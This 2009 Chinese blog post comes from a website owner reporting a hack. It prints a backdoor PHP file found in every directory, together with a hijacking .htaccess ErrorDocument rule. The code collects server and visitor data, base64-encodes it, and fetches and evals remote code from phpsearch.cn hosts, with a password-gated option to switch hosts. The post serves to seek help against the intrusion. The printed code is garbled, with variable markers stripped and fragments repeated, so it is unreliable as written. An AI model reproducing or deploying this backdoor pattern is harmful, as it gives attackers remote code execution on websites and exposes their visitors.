AI摘要

网站遭遇404劫持,通过.htaccess设置,当网站出现404错误时会自动跳转到指定的广告页面。同时,每个目录下都有一个不同文件名的文件,内容涉及服务器信息收集和远程代码执行。作者已将网站内容回档,并寻求高人指点以解决问题。
网站遭遇404劫持,

最新更新:对代码仔细看了一下,该代码的作用是通过.htaccess设置,当网站出现404错误时,也就是网页不存在的时候,就会自动跳转到43199.php,而这个网页指向了网站phpsearch.cn上的一个网页,估计是广告页,http://ads1.phpsearch.cn  http://7.phpsearch.cn   http://71.phpsearch.cn  ,从这个网站内容也可以看出。最后问候一下phpsearch.cn站长老母。

无意之中发现网站上多了一个文件43199.php,文件内容如下:

 error_reporting(0);a=(isset(a=(isset(_SERVER["HTTP_HOST"])?SERVER["HTTPHOST"]:_SERVER["HTTP_HOST"]:HTTP_HOST);b=(isset(b=(isset(_SERVER["SERVER_NAME"])?SERVER["SERVERNAME"]:_SERVER["SERVER_NAME"]:SERVER_NAME);c=(isset(c=(isset(_SERVER["REQUEST_URI"])?SERVER["REQUESTURI"]:_SERVER["REQUEST_URI"]:REQUEST_URI);d=(isset(d=(isset(_SERVER["PHP_SELF"])?SERVER["PHPSELF"]:_SERVER["PHP_SELF"]:PHP_SELF);e=(isset(e=(isset(_SERVER["QUERY_STRING"])?SERVER["QUERYSTRING"]:_SERVER["QUERY_STRING"]:QUERY_STRING);f=(isset(f=(isset(_SERVER["HTTP_REFERER"])?SERVER["HTTPREFERER"]:_SERVER["HTTP_REFERER"]:HTTP_REFERER);g=(isset(g=(isset(_SERVER["HTTP_USER_AGENT"])?SERVER["HTTPUSERAGENT"]:_SERVER["HTTP_USER_AGENT"]:HTTP_USER_AGENT);h=(isset(h=(isset(_SERVER["REMOTE_ADDR"])?SERVER["REMOTEADDR"]:_SERVER["REMOTE_ADDR"]:REMOTE_ADDR);i=(isset(i=(isset(_SERVER["SCRIPT_FILENAME"])?SERVER["SCRIPTFILENAME"]:_SERVER["SCRIPT_FILENAME"]:SCRIPT_FILENAME);j=(isset(j=(isset(_SERVER["HTTP_ACCEPT_LANGUAGE"])?SERVER["HTTPACCEPTLANGUAGE"]:_SERVER["HTTP_ACCEPT_LANGUAGE"]:HTTP_ACCEPT_LANGUAGE);z="/?".base64encode(z="/?".base64_encode(a).".".base64_encode(b).".".base64encode(b).".".base64_encode(c).".".base64_encode(d).".".base64encode(d).".".base64_encode(e).".".base64_encode(f).".".base64encode(f).".".base64_encode(g).".".base64_encode(h).".e.".base64encode(h).".e.".base64_encode(i).".".base64_encode(j);j);f=base64_decode("cGhwc2VhcmNoLmNu");if (basename(c)==basename(c)==basename(i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e04e1a59fe4e05f21b79d8bc541a683e") f=f=_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczEu").f.f.z)));else if(c=filegetcontents(base64decode("aHR0cDovLzcu").c=file_get_contents(base64_decode("aHR0cDovLzcu").f.z))eval(z))eval(c);else{cu=curlinit(base64decode("aHR0cDovLzcxLg==").cu=curl_init(base64_decode("aHR0cDovLzcxLg==").f.z);curlsetopt(z);curl_setopt(cu,CURLOPT_RETURNTRANSFER,1);o=curlexec(o=curl_exec(cu);curl_close(cu);eval(cu);eval(o);};

每个目录下都有这样一个文件,只是文件名不同,都是数字的。还有一个.htaccess文件,内容如下:

Options -MultiViews
ErrorDocument 404 //attachments/date_200706/81783.php

疑似被人注入了,所以把网站内容回档了一下,以上文件内容具体能实现什么功能,偶也不知道,请高人指点,3Q

※相关文章推荐※



最后修改:2009 年 08 月 16 日
点赞的人是最酷的